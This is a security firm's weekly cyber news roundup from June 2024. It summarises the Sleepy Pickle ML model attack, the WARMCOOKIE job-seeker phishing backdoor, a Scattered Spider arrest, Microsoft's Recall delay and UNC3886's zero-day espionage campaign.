Weekly Cyber Reports

This Week in Cyber 21st June 2024

Latest news and views from our Cyber Analysts

Written by

Team Nucleus

Written on

20th June, 2024


Analyst Insight

This week's cybersecurity landscape presents several noteworthy events. The "Sleepy Pickle" attack method, targeting machine learning models via the Pickle serialisation format, highlights the growing sophistication of supply chain threats. The WARMCOOKIE backdoor campaign, which preys on job seekers, demonstrates the persistent use of phishing to deploy malware. The arrest of a key figure in the Scattered Spider cybercrime group marks significant progress in combating high-profile hackers. Microsoft's decision to delay the launch of its Recall feature amid privacy concerns underscores the importance of prioritising security in new technologies.


Lastly, the long-term espionage campaign by UNC3886, exploiting sero-day vulnerabilities in Fortinet and VMware devices, emphasises the critical need for robust defence mechanisms against advanced persistent threats. These incidents collectively illustrate the dynamic challenges in cybersecurity and the ongoing need for vigilant, proactive security measures.


Machine Learning Models targeted by new "Sleepy Pickle" Technique

A new attack method called "Sleepy Pickle" has been discovered by Trail of Bits, targeting machine learning (ML) models. This technique exploits the Pickle format, commonly used to package and distribute ML models, to corrupt them and pose a significant supply chain risk. By embedding a malicious payload into a "pickle" file and delivering it through methods like phishing or supply chain attacks; hackers can execute harmful code when the file is opened.


This enables them to insert backdoors, control outputs, or tamper with data, leading to altered model behaviour and potentially dangerous outcomes. Trail of Bits emphasises that Sleepy Pickle allows attackers to maintain hidden access to ML systems, avoiding detection when the compromised pickle file is loaded. This method is more effective than directly uploading a malicious model, as it can change model behaviour or output without needing to trick users into downloading and running the files.


WARMCOOKIE, A Campaign Targeting Job Seekers

A new campaign has been revealed; one that job seekers with a Windows-based backdoor named WARMCOOKIE. This campaign uses recruitment-themed lures to trick users into downloading malicious software. According to Elastic Security Labs, WARMCOOKIE is designed to scout victim networks and deploy additional malicious payloads. Each sample of the backdoor is compiled with a hard-coded command-and-control IP address and an RC4 key.


The phishing emails, posing as job opportunities from firms like Hays and Michael Page, prompt recipients to click a link and solve a CAPTCHA challenge, which then downloads a JavaScript file. This script runs PowerShell to load WARMCOOKIE, which uses the Background Intelligent Transfer Service (BITS) for downloading. WARMCOOKIE establishes persistence via a scheduled task and performs anti-analysis checks to avoid detection. It captures host information, reads and writes files, executes commands, and takes screenshots, posing a significant threat to users globally.


British Man Alleged To Be Ringleader of Scattered Spider Group Arrested

A 22-year old man has been arrested after being accused of being the ringleader of the Notorious Scattered Spider cybercrime group. Scattered Spider have been responsible for a number of high-profile hacks including DoorDash, Twilio and Mailchimp. Sources from the investigation claim that the individual is a Tyler Buchanan from Dundee. The individual was arrested by Spanish Police in Palma de Mallorca trying to board a flight to Italy. The individual is the second member of Scattered Spider to be arrested after a 19-year old from Florida was charged earlier this year by U.S. authorities.


Microsoft Delays Recall Release Date

Microsoft recently announced their new Recall product to be included as part of Windows 11. The AI powered tool was met with serious criticism over what many in industry called serious security oversights. The Recall feature was designed to take screenshots of a users PC periodically and then train an internal AI on the images. This AI would then be able to provide a tailored experience to the end user. While Microsoft has attempted to temper concerns by clarifying that the raw data would be encrypted and only made accessible when the user authenticates, others have pointed out serious problems in early versions that already show methods of bypassing authentication.


Microsoft has come under growing scrutiny for security shortfalls in recent years which has led to a generally tip-toe approach when it comes to security. While this security centric approach has applied to many of Microsoft's decisions it seemed to slip past for the development of Recall. As we covered last week changes were made to the security and the product was made opt-in. Now Microsoft have delayed the launch of the feature entirely. Specific dates have yet to be released for the renewed release data that was meant to have been the 18th of June.


Fortinet, VMware and 0-Days Exploited in Long-Term Campaign

A cyber espionage group, UNC3886, has been exploiting zero-day vulnerabilities in Fortinet, Ivanti, and VMware devices to infiltrate and maintain access to targeted environments. According to Mandiant researchers, the group uses multiple persistence mechanisms, including network devices, hypervisors, and virtual machines, to ensure continued access even if some layers of their attack are detected and removed.


UNC3886 has been exploiting flaws such as CVE-2022-41328 (Fortinet FortiOS), CVE-2022-22948 (VMware vCenter), and CVE-2023-20867 (VMware Tools) to deploy backdoors and obtain credentials. They have targeted a wide range of industries including government, telecommunications, technology, aerospace, and energy, particularly in North America, Southeast Asia, and Oceania. Their sophisticated techniques include using rootkits like Reptile and Medusa, and backdoors such as MOPSLED and RIFLESPINE, which leverage trusted services like GitHub and Google Drive for command-and-control operations. These methods allow them to evade detection and spy on victims for extended periods.


Recommended Posts

Subscribe to Nucleus blog updates.

Subscribe to our newsletter and stay updated.

Subscribe to Nucleus